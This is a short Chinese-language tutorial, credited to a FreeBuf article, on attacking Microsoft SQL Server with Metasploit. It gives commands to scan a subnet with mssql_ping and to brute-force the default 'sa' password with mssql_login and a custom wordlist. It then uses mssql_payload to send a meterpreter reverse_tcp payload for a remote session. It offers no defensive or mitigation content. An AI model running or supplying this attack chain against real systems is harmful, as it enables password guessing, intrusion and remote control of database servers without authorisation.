from:
https://www.freebuf.com/articles/database/22997.html
命令:
use auxiliary/scanner/mssql/mssql_ping set RHOSTS 192.168.23.0/24 (我们目标的IP段) set THREADS 8 run
攻击
这次攻击是基于一个简单的原理。在大多数情况下,微软的SQL服务器将被安装在一个混合模式下。它的默认用户是“sa”,很多时候对于默认用户只有一个简单的密码。这意味着它会比较容易进行暴力破解得到密码,使用字典文件。这些字典文件可以从网上下载或自己生成。生成定制字典的好处是,允许手动添加特定的术语和字段,比如在安装应用程序是可能使用软相关件名称或销售商作为密码。例如,Sandstone的数据库密码就很可能是像“Sandstone01”这样的字段。
对于攻击,我们将使用内置的工具MSSQL_Login。指定目标和密码文件之后,攻击就开始了。
命令:
use auxiliary/scanner/mssql/mssql_login Set PASS_FILE /root/passwords.txt (字典文件) Set RHOSTS 192.168.23.100 Set Threads 8 Set verbose false run
现在我们可以用这个SA密码与我们的目标计算机建立联系。Kali Linux内置有一个名为mssql_payload的工具。这个工具将允许我们通过端口1433发送我们新的登陆凭据的有效载荷。在这里我们就是基于此攻击目标与我们之间的会话的。
命令:
use exploit/windows/mssql/mssql_payload set RHOST 192.168.23.100 (我们的目标) set password Password01 (我们刚刚获取的密码) use payload/windows/meterpreter/reverse_tcp(our selected payload) exploit